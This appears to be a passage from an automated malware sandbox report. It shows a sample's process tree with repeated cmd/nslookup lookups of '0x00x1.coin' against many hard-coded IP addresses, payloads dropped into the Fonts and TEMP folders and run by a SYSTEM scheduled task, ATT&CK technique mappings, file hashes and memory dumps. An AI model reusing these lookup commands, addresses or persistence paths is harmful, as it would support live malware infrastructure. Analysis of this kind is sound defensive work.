- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 163.172.168.171
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 94.103.153.176
  2⤵
  PID:2984
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 94.103.153.176
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 207.192.71.13
  2⤵
  PID:2108
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 207.192.71.13
    3⤵
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 178.63.116.152
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1080
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 178.63.116.152
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 51.77.227.84
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2068
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 51.77.227.84
    3⤵
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 188.226.146.136
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1344
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 188.226.146.136
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 51.75.173.177
  2⤵
  PID:2052
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 51.75.173.177
    3⤵
    PID:580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 79.124.7.81
  2⤵
  PID:2124
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 79.124.7.81
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 144.76.103.143
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2404
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 144.76.103.143
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 5.132.191.104
  2⤵
  PID:1576
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 5.132.191.104
    3⤵
    PID:2416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 13.239.157.177
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2028
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 13.239.157.177
    3⤵
    PID:2568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 207.148.83.241
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2380
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 207.148.83.241
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 165.227.40.43
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2844
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 165.227.40.43
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2544
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.204.111
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2972
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 142.4.204.111
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c nslookup -qt=A 0x00x1.coin 142.4.205.47
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2644
- - C:\Windows\SysWOW64\nslookup.exe
    nslookup -qt=A 0x00x1.coin 142.4.205.47
    3⤵
    - System Location Discovery: System Language Discovery
    PID:760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\system32\taskeng.exe
taskeng.exe {6928D1BF-7CC8-42AD-A510-8522181E5291} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1816
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\zthqhle.exe
  2⤵
  PID:2144
- - C:\Windows\Fonts\zthqhle.exe
    C:\Windows\Fonts\zthqhle.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:2184
  - - C:\Windows\TEMP\hentai.exe
      C:\Windows\TEMP\hentai.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1932
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\zthqhle.exe
  2⤵
  PID:3024
- - C:\Windows\Fonts\zthqhle.exe
    C:\Windows\Fonts\zthqhle.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:2172
  - - C:\Windows\TEMP\hentai.exe
      C:\Windows\TEMP\hentai.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Persistence

T1070.009

Credential Access

Discovery

Network Share Discovery

T1135

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\zhquqleq\ivtowqsrxkbhlqw7487.exe

Filesize
69KB

MD5
e564dc14ddb5b9c5e1661339b1daed09

SHA1
c951eda553db0d816fc79765937112f66976f8d5

SHA256
3d06ca12e9d6e3effe5fcbb87ebd16d4e978b9657374e3d0fb3c81725d415a98

SHA512
37e69238a07ae617aff72719c15b1503e6c2a94c8fbacc4ca28ebd0d083d93815fd66af83147692ea3449256a5c86a1137d763cff6f21617e8ca80eeb4d91d2e

Download Submit
\Users\Admin\AppData\Local\Temp\hentai.exe

Filesize
64KB

MD5
33332120861d18fbd17fee1025af56dd

SHA1
132a3a34c2178a1d6ea110e904ba81dfc7765b6f

SHA256
7776bb0e5a62e12498d89cf7f34ef2d1fad3ccef52cbb9d5c62ef492f4e3873d

SHA512
ff9aab8f465d060315e998ec0738998506c065f24c3361777bd5b2c7f0fcbe913eb14a71f1ceae30e986bd68989dbdefe00aed9129347cc9435b0c712941e5b1

Download Submit
\Windows\zhquqleq\zthqhle.exe

Filesize
9.3MB

MD5
dddb5a27e2a3e773f8792fa79c0d452f

SHA1
758b5c032d744b3ccded28eccadf348c9c1e13f8

SHA256
b85bc3d040f0bc51cd76ecc0f9cd4d82af083e30fcd20db6207aa3d8ec3123f5

SHA512
b1e1d597188a8bf7720802cc965b6f4bd2be9542df3a2fb5300bd6b0f8d5468836ed7fc607a3e29983755281b22450fccc434b9e424a2644eaa27aa53953f757

Download Submit
memory/2160-13-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/2160-23-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2392-28-0x0000000000400000-0x0000000000D0F000-memory.dmp

Filesize
9.1MB

Download
memory/2712-12-0x0000000000400000-0x0000000000D0F000-memory.dmp

Filesize
9.1MB

Download
memory/2712-0-0x0000000000400000-0x0000000000D0F000-memory.dmp

Filesize
9.1MB

Download
memory/2772-59-0x00000000015B0000-0x0000000001619000-memory.dmp

Filesize
420KB

Download
memory/2772-58-0x00000000015B0000-0x0000000001619000-memory.dmp

Filesize
420KB

Download
memory/2772-57-0x0000000010000000-0x000000001000B000-memory.dmp

Filesize
44KB

Download
memory/2772-75-0x00000000015B0000-0x0000000001619000-memory.dmp

Filesize
420KB

Download
memory/2772-76-0x00000000015B0000-0x0000000001619000-memory.dmp

Filesize
420KB

Download
memory/2972-61-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2972-67-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download